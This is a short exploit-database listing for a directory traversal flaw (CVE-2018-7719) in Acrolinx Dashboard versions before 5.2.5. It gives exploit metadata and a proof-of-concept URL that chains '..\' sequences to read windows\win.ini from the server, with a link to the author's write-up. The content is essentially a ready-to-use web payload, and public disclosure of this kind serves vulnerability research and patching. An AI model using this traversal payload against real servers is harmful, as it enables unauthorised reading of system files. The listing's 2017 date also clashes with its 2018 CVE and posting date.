Acrolinx Server Directory Traversal

2018-03-26T00:00:00
ID PACKETSTORM:146911
Type packetstorm
Reporter Berk Dusunur
Modified 2018-03-26T00:00:00

Description

                                        
                                            `# Exploit Title: Acrolinx Dashboard Directory Traversal  
# CVE: CVE 2018-7719  
# Date: 19.02.2017  
# Exploit Author: Berk Dusunur  
# Vendor Homepage: www.acrolinx.com  
# Version:Before 5.2.5  
  
PoC  
  
Acrolinx dashboard windows works on the server.  
  
  
http://localhost/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini  
  
http://www.berkdusunur.net/2018/03/tr-en-acrolinx-dashboard-directory.html  
  
`